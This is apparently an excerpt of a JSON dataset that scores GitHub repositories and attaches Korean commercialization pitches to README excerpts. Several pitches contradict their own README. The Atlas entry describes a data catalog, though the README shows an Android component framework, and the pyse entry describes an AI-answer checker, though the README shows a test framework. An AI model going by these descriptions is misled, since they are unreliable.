show how PyTorch puts them in the hands of practitioners. In\nthe book, we try to provide intuition that will","composite_score":0.3596,"license_safety_tag":"unknown"},{"name":"aakashverma1124/Data-Structures-and-Algorithms-for-Interviews","github_url":"https://github.com/aakashverma1124/Data-Structures-and-Algorithms-for-Interviews","stars":16,"language":"Java","license":"unknown","abandonment_months":18,"description":"# Data-Structures-and-Algorithms-for-Interviews 분석\n\n## 왜 보물인가\n취업 면접에서 프로그래밍 문제를 푸는 방법을 배울 수 있는 실용적인 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 코딩 면접 준비 강좌를 판매하는 SaaS 서비스 (예: 면접 준비 구독형 플랫폼)\n2. **기업","readme_excerpt":"","composite_score":0.3594,"license_safety_tag":"unknown"},{"name":"iamtrask/Grokking-Deep-Learning","github_url":"https://github.com/iamtrask/Grokking-Deep-Learning","stars":7,"language":"Jupyter Notebook","license":"unknown","abandonment_months":24,"description":"# Grokking-Deep-Learning 분석\n\n## 왜 보물인가\n컴퓨터가 인간처럼 생각하고 배우도록 가르치는 기술(딥러닝)을 초보자도 이해할 수 있게 설명하는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 인공지능 입문 강좌를 제공하는 코드카데미, 유데미 같은 서비스에 커리큘럼 판매\n2. **기업 교육용 SaaS**: ","readme_excerpt":"# Grokking-Deep-Learning\n[![Run on FloydHub](https://static.floydhub.com/button/button-small.svg)](https://floydhub.com/run)\n\nThis repository accompanies the book \"Grokking Deep Learning\", [available here](https://manning.com/books/grokking-deep-learning?a_aid=grokkingdl&a_bid=32715258 \"Grokking Deep Learning\"). Also, the coupon code \"trask40\" is good for a 40% discount.\n\n- [Chapter 3 - Forward Propagation - Intro to Neural Prediction](https://github.com/iamtrask/Grokking-Deep-Learning/blob/master/Chapter3%20-%20%20Forward%20Propagation%20-%20Intro%20to%20Neural%20Prediction.ipynb)\n- [Chapter 4 - Gradient Descent - Into to Neural Learning](https://github.com/iamtrask/Grokking-Deep-Learning/blob/master/Chapter4%20-%20Gradient%20Descent%20-%20Intro%20to%20Neural%20Learning.ipynb)\n- [Chapter 5 - Generalizing Gradient Descent - Learning Multiple Weights at a Time](https://github.com/iamtrask/Grokking-Deep-Learning/blob/master/Chapter5%20-%20Generalizing%20Gradient%20Descent%20-%20Learning%","composite_score":0.3594,"license_safety_tag":"unknown"},{"name":"roughike/BottomBar","github_url":"https://github.com/roughike/BottomBar","stars":13,"language":"Java","license":"apache-2.0","abandonment_months":57,"description":"# BottomBar 저장소 분석\n\n## 왜 보물인가\n스마트폰 앱의 하단 네비게이션 바를 쉽게 만들 수 있는 완성도 높은 UI 도구로, 앱 개발자들이 반복적으로 구현하는 작업을 빠르게 해결해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **앱 개발 프레임워크 SaaS**: 개발자들이 클릭만으로 하단 네비게이션을 커스터마이징할 수 있는 온라인 빌더 서비스\n2. ","readme_excerpt":"# BottomBar (Deprecated)\n\nI don't have time to maintain this anymore. I basically wrote the whole library in a rush, without tests, while being a serious expert beginner at the time. As a result, there's a lot of unpredictable moving parts and the tests probably aren't that great either. Don't really know, since I haven't touched this in ages.\n\nI'd recommend you to use the official BottomNavigationView from Google and urge them to implement the features you need. Or use another 3rd party library.\n\n[![Build Status](https://travis-ci.org/roughike/BottomBar.svg?branch=master)](https://travis-ci.org/roughike/BottomBar) [![Coverage Status](https://coveralls.io/repos/github/roughike/BottomBar/badge.svg?branch=development)](https://coveralls.io/github/roughike/BottomBar?branch=master) [![Download](https://api.bintray.com/packages/roughike/maven/bottom-bar/images/download.svg)](https://bintray.com/roughike/maven/bottom-bar/_latestVersion)\n\n<img src=\"https://raw.githubusercontent.com/roughike/B","composite_score":0.3593,"license_safety_tag":"safe"},{"name":"chvin/react-tetris","github_url":"https://github.com/chvin/react-tetris","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":22,"description":"# react-tetris 프로젝트 분석\n\n## 왜 보물인가\n웹 브라우저에서 바로 즐길 수 있는 테트리스 게임으로, 게임 개발 학습 자료나 웹 게임 플랫폼의 기초가 될 수 있는 검증된 코드베이스입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 게임 플랫폼 SaaS**: 여러 고전 게임을 한 곳에서 즐기는 구독형 서비스의 핵심 게임 중 하나로 탑재\n2. **기","readme_excerpt":"### English introduction\nPlease view [README-EN.md](https://github.com/chvin/react-tetris/blob/master/README-EN.md)\n\n----\n## 用React、Redux、Immutable做俄罗斯方块\n\n----\n俄罗斯方块是一直各类程序语言热衷实现的经典游戏，JavaScript的实现版本也有很多，用React 做好俄罗斯方块则成了我一个目标。\n\n戳：[https://chvin.github.io/react-tetris/](https://chvin.github.io/react-tetris/) 玩一玩！\n\n----\n### 效果预览\n![效果预览](https://img.alicdn.com/tps/TB1Ag7CNXXXXXaoXXXXXXXXXXXX-320-483.gif)\n\n正常速度的录制，体验流畅。\n\n### 响应式\n![响应式](https://img.alicdn.com/tps/TB1AdjZNXXXXXcCapXXXXXXXXXX-480-343.gif)\n\n不仅指屏幕的自适应，而是`在PC使用键盘、在手机使用手指的响应式操作`：\n\n![手机](https://img.alicdn.com/tps/TB1kvJyOVXXXXbhaFXXXXXXXXXX-320-555.gif)\n\n### 数据持久化\n![数据持久化](https://img.alicdn.com/tps/TB1EY7cNXXXXXXraXXXXXXXXXXX-320-399.gif)\n\n玩单机游戏最怕什么？断电。通过订阅 `store.subscribe`，将state储存在localStorage，精确记录所有状态。网页关了刷新了、程序崩溃了、手机没电了，重新打开连接，都可以继续。\n\n### Redux 状态预览（[Redux DevTools extension](https://github.com/zalmoxisus/redux-devtools-extension)）\n![Redux状态预览](https://img.alicdn.com/tps/TB1hGQqNXXXXXX3XFXXXXXXXXXX-640-381.gif)\n\nRedux设计管理了","composite_score":0.3591,"license_safety_tag":"unknown"},{"name":"guyonroche/exceljs","github_url":"https://github.com/guyonroche/exceljs","stars":11,"language":"JavaScript","license":"mit","abandonment_months":16,"description":"# exceljs 저장소 분석\n\n## 왜 보물인가\n엑셀 파일을 프로그래밍으로 자동 생성·편집할 수 있는 도구로, 반복적인 엑셀 작업을 컴퓨터가 대신 처리해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 급여 관리 시스템이 매달 자동으로 급여명세서 엑셀 파일 생성\n- **내부 업무 도구**: 마케팅팀이 매일 광고 ","readme_excerpt":"# ExcelJS\n\n[![Build Status](https://github.com/exceljs/exceljs/actions/workflows/tests.yml/badge.svg?branch=master&event=push)](https://github.com/exceljs/exceljs/actions/workflows/tests.yml)\n\nRead, manipulate and write spreadsheet data and styles to XLSX and JSON.\n\nReverse engineered from Excel spreadsheet files as a project.\n\n# Translations\n\n* [中文文档](README_zh.md)\n\n# Installation\n\n```shell\nnpm install exceljs\n```\n\n# New Features!\n\n* Merged [Add pivot table with limitations #2551](https://github.com/exceljs/exceljs/pull/2551). <br/> Many thanks to Protobi and <a href=\"https://github.com/mikez\">Michael</a> for this contribution!\n* Merged [fix: styles rendering in case when \"numFmt\" is present in conditional formatting rules (resolves #1814) #1815](https://github.com/exceljs/exceljs/pull/1815). <br/> Many thanks to [@andreykrupskii](https://github.com/andreykrupskii) for this contribution!\n* Merged [inlineStr cell type support #1575 #1576](https://github.com/exceljs/exceljs/pull/1576). ","composite_score":0.359,"license_safety_tag":"safe"},{"name":"alibaba/atlas","github_url":"https://github.com/alibaba/atlas","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":53,"description":"# Alibaba/Atlas 상용화 분석\n\n## 왜 보물인가\n대규모 데이터를 체계적으로 관리하고 추적할 수 있는 시스템으로, 기업의 데이터 자산을 지도처럼 보여주는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업 대상 \"데이터 관리 클라우드 플랫폼\" 구독 서비스로 월별 이용료 청구\n- **내부 업무 도구**: 대기업의 데이터 부","readme_excerpt":"# Atlas\n\n[![license](http://img.shields.io/badge/license-Apache2.0-brightgreen.svg?style=flat)](https://github.com/alibaba/atlas/blob/master/LICENSE)\n[![Release Version](https://img.shields.io/badge/atlas__core-5.1.0.9--rc26-orange.svg)](https://github.com/alibaba/atlas/releases/tag/v5.1.0.9-rc26) \n[![Release Version](https://img.shields.io/badge/atlasplugin-3.0.1--rc88-green.svg)](https://github.com/alibaba/atlas/releases/tag/v5.1.0.9-rc26) \n\n\n> A powerful Android Dynamic Component Framework.\n\nAtlas is an Android client-side containerization framework. we call it android dynamic component framework.\n\nAtlas provides decoupled, component, and dynamic support. Atlas covers various issues in the project coding period, Apk run-time and follow-up operation and maintenance.\n\nIn the project period, Atlas enable engineers independent development, independent debug, because their project were physical isolation.\n\nIn the apk run-time, Atlas has complete component life cycle, class isolation and ","composite_score":0.3589,"license_safety_tag":"safe"},{"name":"otale/tale","github_url":"https://github.com/otale/tale","stars":6,"language":"JavaScript","license":"mit","abandonment_months":26,"description":"# otale/tale 프로젝트 분석\n\n## 왜 보물인가\n이 프로젝트는 이야기나 콘텐츠를 쉽게 만들고 공유할 수 있는 도구로, 블로그나 포트폴리오 같은 개인 창작물을 간단히 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개인 작가나 블로거를 위한 구독형 콘텐츠 관리 플랫폼으로 운영\n- **내부 업무 도구**: 회사 내부의 스토","readme_excerpt":"# Tale Blog\n\n![Tale](https://ooo.0o0.ooo/2017/02/27/58b43450c9182.png)\n\n> Tale's English meaning for the **Story**, I believe that every person who insists on writing a blog is a story; Chinese you call it ***Collapse*** does not matter.\n\n`Tale` uses a lightweight mvc framework [Blade](https://github.com/biezhi/blade) for development, the default theme using a beautiful [pinghsu](https://github.com/chakhsu/pinghsu), if you think this project is good, please support it [star]((https://github.com/otale/tale/stargazers)).\n\ndemo website：https://tale.biezhi.me\n\n[![Build Status](https://img.shields.io/travis/otale/tale.svg?style=flat-square)](https://travis-ci.org/otale/tale)\n[![License](https://img.shields.io/badge/license-MIT-4EB1BA.svg?style=flat-square)](https://github.com/otale/tale/blob/master/LICENSE)\n[![@biezhi on zhihu](https://img.shields.io/badge/zhihu-%40biezhi-red.svg?style=flat-square)](https://www.zhihu.com/people/biezhi)\n[![Gitter](https://badges.gitter.im/biezhi/tale-group.s","composite_score":0.3588,"license_safety_tag":"safe"},{"name":"hansonwang99/Spring-Boot-In-Action","github_url":"https://github.com/hansonwang99/Spring-Boot-In-Action","stars":8,"language":"Java","license":"unknown","abandonment_months":42,"description":"# Spring-Boot-In-Action 저장소 분석\n\n## 왜 보물인가\n웹 서비스를 만드는 데 필요한 핵심 기술을 정리한 학습 자료로, 비용을 절감하면서 안정적인 시스템을 구축할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독형 회계 관리 소프트웨어나 프로젝트 관리 도구의 백엔드 시스템 구축\n- **내부 업무 도구**:","readme_excerpt":"\n\n\n### 本项目为 《Spring Boot实战合集》的系列文章，代码已开源，并持续保持更新。如果您觉得该项目对您有用，欢迎点击右上方的 Star按钮支持一波！！\n\n- 个人博客：https://www.codesheep.cn\n- GitHub：https://github.com/hansonwang99\n\n另外所有内容都在我的个人微信公众号 **CodeSheep** 最先推出，大家可以关注一下，可 **长按** 或 **扫描** 下面的 **小心心** 来获取更多 **务实、能看懂、可复现的** 原创文。除此之外 **提问/进群交流** 也可以扫码进行！！！\n\n![CodeSheep · 程序羊](https://www.codesheep.cn/css/images/codesheep_logo_heart.jpg)\n\n[![Badge](https://img.shields.io/badge/link-996.icu-%23FF4D5B.svg)](https://996.icu/#/en_US)\n[![LICENSE](https://img.shields.io/badge/license-Anti%20996-blue.svg)](https://github.com/996icu/996.ICU/blob/master/LICENSE)\n[![Slack](https://img.shields.io/badge/slack-996icu-green.svg)](https://join.slack.com/t/996icu/shared_invite/enQtNTg4MjA3MzA1MzgxLWQyYzM5M2IyZmIyMTVjMzU5NTE5MGI5Y2Y2YjgwMmJiMWMxMWMzNGU3NDJmOTdhNmRlYjJlNjk5ZWZhNWIwZGM)\n\n---\n\n---\n\n# 数据库/缓存相关\n\n- [Guava Cache本地缓存在 Spring Boot应用中的实践](https://github.com/hansonwang99/Spring-Boot-In-Action/tree/master/springbt_guava_cache)\n\n- [EVCache缓存在 Spring Boot中的实战](https://","composite_score":0.3587,"license_safety_tag":"unknown"},{"name":"florent37/MaterialViewPager","github_url":"https://github.com/florent37/MaterialViewPager","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":93,"description":"# MaterialViewPager 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 화면을 좌우로 넘기는 기본 기능을 아름답게 구현한 재사용 가능한 설계 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **사진 공유 앱 개발사**: 사용자가 사진을 쉽게 넘기며 볼 수 있는 기능 제공\n2. **커머스 플랫폼**: 상품 상세페이지에서 여러 이미지를 부드럽게 전환하","readme_excerpt":"MaterialViewPager\n=======\n\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MaterialViewPager-brightgreen.svg?style=flat)](http://android-arsenal.com/details/1/1731)\n[![Android Weekly](https://img.shields.io/badge/android--weekly-151-blue.svg)](http://androidweekly.net/issues/issue-151)\n[![CircleCI](https://circleci.com/gh/florent37/MaterialViewPager.svg?style=svg)](https://circleci.com/gh/florent37/MaterialViewPager)\n\nMaterial Design ViewPager easy to use library\n\n<a href=\"https://goo.gl/WXW8Dc\">\n  <img alt=\"Android app on Google Play\" src=\"https://developer.android.com/images/brand/en_app_rgb_wo_45.png\" />\n</a>\n\n[![Build screen](https://raw.githubusercontent.com/florent37/MaterialViewPager/master/screenshots/screenshot_2_small.png)](http://youtu.be/g6tTDVceM9E)\n\n# Sample\n\n<a href=\"https://goo.gl/WXW8Dc\">\n  <img alt=\"Android app on Google Play\" src=\"https://developer.android.com/images/brand/en_app_rgb_wo_45.png\" />\n</a>\n\nAnd have a look on a sample Youtube Video : [","composite_score":0.3587,"license_safety_tag":"safe"},{"name":"HotBitmapGG/bilibili-android-client","github_url":"https://github.com/HotBitmapGG/bilibili-android-client","stars":9,"language":"Java","license":"WTFPL","abandonment_months":63,"description":"# bilibili-android-client 가치 평가\n\n## 왜 보물인가\n중국 최대 동영상 플랫폼인 빌리빌리의 안드로이드 앱 소스코드로, 대규모 동영상 스트리밍 서비스 구축 방식을 학습할 수 있는 실제 사례입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 동영상 공유 플랫폼 구축 시 UI/UX 디자인 패턴과 성능 최적화 기법 적용\n- **","readme_excerpt":"# An Unofficial Bilibili Android Client\n\n[![Wercker](https://img.shields.io/badge/Android%20Client-bilibili-brightgreen.svg)](https://github.com/HotBitmapGG/bilibili) [![Issue Stats](https://img.shields.io/issuestats/i/github/strongloop/express.svg?maxAge=2592000)]()  [![TeamCity CodeBetter](https://img.shields.io/teamcity/codebetter/bt428.svg?maxAge=2592000)]()\n\n![](https://github.com/HotBitmapGG/OhMyBiliBili/blob/OhMyBiliBili/art/bg2.png?raw=true)\n\n## Screenshots\n\n<a href=\"art/00.png\"><img src=\"art/00.png\" width=\"30%\"/></a> <a href=\"art/01.png\"><img src=\"art/01.png\" width=\"30%\"/></a> <a href=\"art/02.png\"><img src=\"art/02.png\" width=\"30%\"/></a>\n\n<a href=\"art/03.png\"><img src=\"art/03.png\" width=\"30%\"/></a> <a href=\"art/04.png\"><img src=\"art/04.png\" width=\"30%\"/></a> <a href=\"art/05.png\"><img src=\"art/05.png\" width=\"30%\"/></a>\n\n<a href=\"art/06.png\"><img src=\"art/06.png\" width=\"30%\"/></a> <a href=\"art/07.png\"><img src=\"art/07.png\" width=\"30%\"/></a> <a href=\"art/003.png\"><img src=\"art/003","composite_score":0.3586,"license_safety_tag":"safe"},{"name":"defnngj/pyse","github_url":"https://github.com/defnngj/pyse","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":3,"description":"# pyse 저장소 분석 보고서\n\n## 왜 보물인가\nAI가 생성한 답변이 실제로 맞는지 자동으로 검증해주는 도구로, 신뢰할 수 없는 AI 출력물을 걸러내는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **고객 지원 챗봇 서비스**: 회사의 AI 챗봇이 고객 질문에 대해 잘못된 답변을 주지 않도록 자동 검증\n- **온라인 교육 플랫폼**: 학생들이 AI ","readme_excerpt":"[GitHub](https://github.com/SeldomQA/seldom) | [Gitee](https://gitee.com/fnngj/seldom) |\n\n![](./images/seldom_logo.jpg)\n\n[![PyPI version](https://badge.fury.io/py/seldom.svg)](https://badge.fury.io/py/seldom) ![PyPI - Python Version](https://img.shields.io/pypi/pyversions/seldom)\n\nSeldom is an automation testing framework based on unittest.\n\n> seldom 是基于unittest 的自动化测试框架。\n\n### Features\n\n⭐ web/app/api全功能测试框架\n\n⭐ 提供脚手架快速创建自动化项目\n\n⭐ 集成`XTestRunner`测试报告，现代美观\n\n⭐ 提供丰富的断言\n\n⭐ 提供强大的`数据驱动`\n\n⭐ 平台化支持\n\n### Install\n\n```shell\npip install seldom\n```\n\nIf you want to keep up with the latest version, you can install with GitHub/Gitee repository url:\n\n```shell\n> pip install -U git+https://github.com/SeldomQA/seldom.git@master\n> pip install -U git+https://gitee.com/fnngj/seldom.git@master\n```\n\n### 🤖 Quick Start\n\n1、查看帮助：\n\n```shell\nseldom --help\n                                                                                                    \n Usage: seldom [OPTIONS]                                          ","composite_score":0.3586,"license_safety_tag":"safe"},{"name":"fastai/course-nlp","github_url":"https://github.com/fastai/course-nlp","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":39,"description":"# fastai/course-nlp 사업화 분석\n\n## 왜 보물인가\n자연어 처리(텍스트 이해) 기술을 배우는 실무 교육 자료로, 이를 상용화하면 기업의 고객 응답, 감정 분석, 문서 분류 등 다양한 업무를 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소셜미디어 모니터링 플랫폼 - 고객 댓글과 리뷰를 자동으로 분석하는 구독","readme_excerpt":"# A Code-First Intro to Natural Language Processing\n\nYou can find out about the course in [this blog post](https://www.fast.ai/2019/07/08/fastai-nlp/) and all [lecture videos are available here](https://www.youtube.com/playlist?list=PLtmWHNX-gukKocXQOkQjuVxglSDYWsSh9).\n\nThis course was originally taught in the [University of San Francisco's Masters of Science in Data Science](https://www.usfca.edu/arts-sciences/graduate-programs/analytics) program, summer 2019.  The course is taught in Python with Jupyter Notebooks, using libraries such as sklearn, nltk, pytorch, and fastai.\n\n## Table of Contents\nThe following topics will be covered:\n\n1\\. What is NLP?\n  - A changing field\n  - Resources\n  - Tools\n  - Python libraries\n  - Example applications\n  - Ethics issues\n\n2\\. Topic Modeling with NMF and SVD\n  - Stop words, stemming, & lemmatization\n  - Term-document matrix\n  - Topic Frequency-Inverse Document Frequency (TF-IDF)\n  - Singular Value Decomposition (SVD)\n  - Non-negative Matrix Factoriz","composite_score":0.3584,"license_safety_tag":"unknown"},{"name":"LittleFriendsGroup/AndroidSdkSourceAnalysis","github_url":"https://github.com/LittleFriendsGroup/AndroidSdkSourceAnalysis","stars":7,"language":"","license":"unknown","abandonment_months":100,"description":"# AndroidSdkSourceAnalysis 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 어려워하는 기본 원리를 쉽게 배울 수 있는 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 안드로이드 개발 초보자를 위한 온라인 학습 플랫폼으로 월 구독 회원들에게 소스 코드 분석 강의 제공\n2. **내부 업무 도구**","readme_excerpt":"ANDROID SDK 源码解析\n===============================\n\n![](https://github.com/yuxingxin/AndroidWidgetClassGraph/blob/master/img/android.jpg)\n\n#### GitHub小伙伴公众号，欢迎扫码关注！\n\n<img src=\"https://raw.githubusercontent.com/LittleFriendsGroup/AndroidSdkSourceAnalysis/master/images/qrcode.jpg\" width=\"156\" height=\"156\">\n\n-----\n\n##### 概要说明：\n\n* 已发布文章 发表已经整理好的文章，读者可以阅读学习！\n\n* 认领方式 可以在 issues 提你要认领什么内容。\n\n~~* 已认领文章 如果你喜欢的文章被认领，你想参与,你还是可以分析认领，我们选择好的发布，也可以作为校对者。认领方式：可以在 Issues 提你要认领什么内容~~\n\n~~* 待认领文章 是想参与的的同学可以参与进来，如被认领，也可以做校对者，若想解析的内容不在表格，可以联系我们添加分析的内容，方式：在 Issues 提你要认领什么内容~~\n\n##### 校对发布说明：\n分析完成后可直接在对应 issue 下回复，可直接原文回复也可是原文链接，校对通过后会直接进行发布。（这样大家可以更灵活自由的安排，同时也可以更快的发布校对好的文章）\n\n##### 转载说明：\n这里每一篇文章我们都或多或少的付出了时间、精力分析校对，第一次搞这种源码解析，可能有很多地方做的不好，但是我们用心做了！所以，如果你想转载，至少文章开头写下来源地址：\n\n[https://github.com/LittleFriendsGroup/AndroidSdkSourceAnalysis](https://github.com/LittleFriendsGroup/AndroidSdkSourceAnalysis)\n\n,还有写下分析者名字！请尊重每一篇文章的劳动成果，谢谢！\n\n## 已发布文章\n\n### 第三期\nClass | 分析者 | 校对者 | 版本 | 发布时间\n:------------- | :------------- | :---","composite_score":0.3583,"license_safety_tag":"unknown"},{"name":"BoostIO/Boostnote","github_url":"https://github.com/BoostIO/Boostnote","stars":13,"language":"JavaScript","license":"NOASSERTION","abandonment_months":38,"description":"# Boostnote 사업화 분석\n\n## 왜 보물인가\n메모와 문서를 한곳에서 정리하고 팀원들과 함께 작업할 수 있는 협업 도구로, 노션이나 컨플루언스처럼 생산성을 높여주는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 팀 프로젝트 관리와 문서 공유 기능을 갖춘 구독형 협업 플랫폼으로 운영\n2. **내부 업무 도구**: 회사 내 지식","readme_excerpt":"> # New Boost Note app is available!\n>\n> We've launched a new Boost Note app which supports real-time collaborative writing.\n>\n> And it is open sourced too! Please check it out! https://github.com/BoostIO/BoostNote-App\n>\n> ## 📦 Download App\n>\n> ### 🖥 Desktop\n>\n> - [🌎 Web App (boostnote.io)](https://boostnote.io)\n> - [🍎 macOS (.dmg)](https://github.com/BoostIO/BoostNote-App/releases/latest/download/boost-note-mac.dmg)\n> - [:framed_picture: Windows (.exe NSIS)](https://github.com/BoostIO/BoostNote-App/releases/latest/download/boost-note-win.exe)\n> - [🐧 Linux (.deb)](https://github.com/BoostIO/BoostNote-App/releases/latest/download/boost-note-linux.deb)\n> - [🐧 Linux (.rpm)](https://github.com/BoostIO/BoostNote-App/releases/latest/download/boost-note-linux.rpm)\n>\n> ### 📱 Mobile\n>\n> - [🌎 Mobile Web App (m.boostnote.io)](https://m.boostnote.io)\n> - [🍏 iOS (Apple App Store)](https://apps.apple.com/gb/app/boost-note-mobile/id1576176505)\n> - [🤖 Android (Google Play Store)](https://play.google.c","composite_score":0.3583,"license_safety_tag":"unknown"},{"name":"sofastack/sofa-mosn","github_url":"https://github.com/sofastack/sofa-mosn","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":10,"description":"# sofastack/sofa-mosn 보물 분석 보고서\n\n## 왜 보물인가\n금융 대규모 거래를 안정적으로 처리하는 '통신 중간관리자' 역할을 하는 오픈소스로, 복잡한 시스템 간 연결을 간단하게 만들어줍니다.\n\n## 어디에 팔 수 있나\n\n1. **멀티클라우드 관리 SaaS**: 아마존·구글·마이크로소프트 등 여러 클라우드를 동시에 사용하는 기업들에게 통합 ","readme_excerpt":"<p align=\"center\">\n<img src=\"https://raw.githubusercontent.com/mosn/community/master/icons/png/mosn-labeled-horizontal.png\" width=\"350\" title=\"MOSN Logo\" alt=\"MOSN logo\">\n</p>\n\n[![Build Status](https://travis-ci.com/mosn/mosn.svg?branch=master)](https://travis-ci.com/mosn/mosn)\n[![codecov](https://codecov.io/gh/mosn/mosn/branch/master/graph/badge.svg)](https://codecov.io/gh/mosn/mosn)\n[![Go Report Card](https://goreportcard.com/badge/github.com/mosn/mosn)](https://goreportcard.com/report/github.com/mosn/mosn)\n![license](https://img.shields.io/badge/license-Apache--2.0-green.svg)\n\n[中文](README_ZH.md)\n\nMOSN (Modular Open Smart Network) is a cloud-native network proxy written in Go language. It is open sourced by Ant Group and verified by hundreds of thousands of production containers in 11.11 global shopping festival. MOSN provides the capabilities of multiple protocol, modularity, intelligent and security. It integrates a large number of cloud-native components, and also integrates a Env","composite_score":0.3576,"license_safety_tag":"safe"},{"name":"andreis/interview","github_url":"https://github.com/andreis/interview","stars":7,"language":"","license":"WTFPL","abandonment_months":17,"description":"# andreis/interview 분석 리포트\n\n## 왜 보물인가\n개발자 채용 면접을 준비하는 사람들을 위해 실제 면접 질문과 답변을 모아놓은 실용적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **취업 준비 SaaS 서비스**: 면접 질문 데이터베이스를 보유한 구독형 면접 준비 플랫폼으로 제공\n2. **대학교 취업 지원 센터 내부 도구**: 학","readme_excerpt":"# Content <!-- omit in toc -->\n\n- [Star History](#star-history)\n- [Algorithms](#algorithms)\n  - [Books](#books)\n  - [Coding practice](#coding-practice)\n  - [Guides](#guides)\n  - [Misc](#misc)\n- [Guides](#guides-1)\n  - [Articles](#articles)\n  - [Books](#books-1)\n  - [Courses](#courses)\n  - [Misc](#misc-1)\n  - [Mock interviews](#mock-interviews)\n  - [Q\\&A](#qa)\n  - [Sites](#sites)\n  - [Videos](#videos)\n- [Languages and technologies](#languages-and-technologies)\n  - [Android](#android)\n  - [ASP.NET](#aspnet)\n  - [C#](#c)\n  - [Go](#go)\n  - [JavaScript](#javascript)\n  - [Node](#node)\n  - [PHP](#php)\n  - [Python](#python)\n  - [React](#react)\n- [Other topics](#other-topics)\n  - [Crypto](#crypto)\n  - [Funny](#funny)\n  - [Maths](#maths)\n  - [Networking](#networking)\n  - [Operating systems](#operating-systems)\n  - [System design](#system-design)\n- [Similar repos](#similar-repos)\n\n_Found a dead link? Try [archive.is](http://archive.is/) or the [Wayback Machine](https://archive.org/web/)._\n\n## Sta","composite_score":0.3573,"license_safety_tag":"safe"},{"name":"kjw0612/awesome-rnn","github_url":"https://github.com/kjw0612/awesome-rnn","stars":5,"language":"","license":"unknown","abandonment_months":52,"description":"# kjw0612/awesome-rnn 분석 보고서\n\n## 왜 보물인가\n순환 신경망(RNN)이라는 AI 기술을 배우고 실무에 적용하려는 사람들이 참고할 수 있는 종합 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 시계열 데이터 분석 플랫폼(주식 예측, 날씨 예보 등)을 구축할 때 필요한 기술 기초 제공\n2. **내부 업무 ","readme_excerpt":"# Awesome Recurrent Neural Networks\n\nA curated list of resources dedicated to recurrent neural networks (closely related to *deep learning*).\n\nMaintainers - [Myungsub Choi](https://github.com/myungsub), [Taeksoo Kim](https://github.com/jazzsaxmafia), [Jiwon Kim](https://github.com/kjw0612)\n\nWe have pages for other topics: [awesome-deep-vision](https://github.com/kjw0612/awesome-deep-vision), [awesome-random-forest](https://github.com/kjw0612/awesome-random-forest)\n\n## Contributing\nPlease feel free to [pull requests](https://github.com/kjw0612/awesome-rnn/pulls), email Myungsub Choi (cms6539@gmail.com) or join our chats to add links.\n\nThe project is not actively maintained.\n\n[![Join the chat at https://gitter.im/kjw0612/awesome-rnn](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/kjw0612/awesome-rnn?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## Sharing\n+ [Share on Twitter](http://twitter.com/home?status=http://jiwonkim.org/awesome-rnn%0AReso","composite_score":0.3572,"license_safety_tag":"unknown"},{"name":"quarkslab/QBDL","github_url":"https://github.com/quarkslab/QBDL","stars":8,"language":"C++","license":"Apache-2.0","abandonment_months":18,"description":"# QBDL (Quarkslab Binary Data Loader) 분석\n\n## 왜 보물인가\n복잡한 데이터 파일을 자동으로 읽고 정리해주는 도구로, 보안 전문가나 소프트웨어 분석가들이 악성코드를 조사할 때 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안팀 SaaS 서비스**\n- 의심스러운 파일을 업로드하면 자동으로 분석 결","readme_excerpt":"# QuarkslaB Dynamic Loader\n\nThe QuarkslaB Dynamic Linker (QBDL) library aims at providing a modular and\nportable way to dynamically load and link binaries.\n\n## Documentation\n\nSee [here](https://quarkslab.github.io/QBDL/0.1.0).\n\n## Quick example\n\nHere is a quick example using the Python API to run simple MachO binaries under\nLinux:\n\n```python\nimport pyqbdl\nimport lief\nimport sys\nimport ctypes\n\nclass TargetSystem(pyqbdl.engines.Native.TargetSystem):\n    def __init__(self):\n        super().__init__(pyqbdl.engines.Native.memory())\n        self.libc = ctypes.CDLL(\"libc.so.6\")\n\n    def symlink(self, loader: pyqbdl.Loader, sym: lief.Symbol) -> int:\n        if not sym.name.startswith(\"_\"):\n            return 0\n        ptr = getattr(self.libc, sym.name[1:], 0)\n        if ptr != 0:\n            ptr = ctypes.cast(ptr, ctypes.c_void_p).value\n        return ptr\n\nloader = pyqbdl.loaders.MachO.from_file(sys.argv[1], pyqbdl.engines.Native.arch(), TargetSystem(),\n                                        ","composite_score":0.3568,"license_safety_tag":"safe"},{"name":"summerblue/larabbs","github_url":"https://github.com/summerblue/larabbs","stars":5,"language":"HTML","license":"unknown","abandonment_months":39,"description":"# summerblue/larabbs 상용화 분석\n\n## 왜 보물인가\nLaravel 기반의 커뮤니티 플랫폼으로, 포럼이나 토론 사이트를 빠르게 구축할 수 있는 완성도 높은 기반이 되어 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 내부 질문-답변 플랫폼을 월 구독 형태로 제공하기\n2. 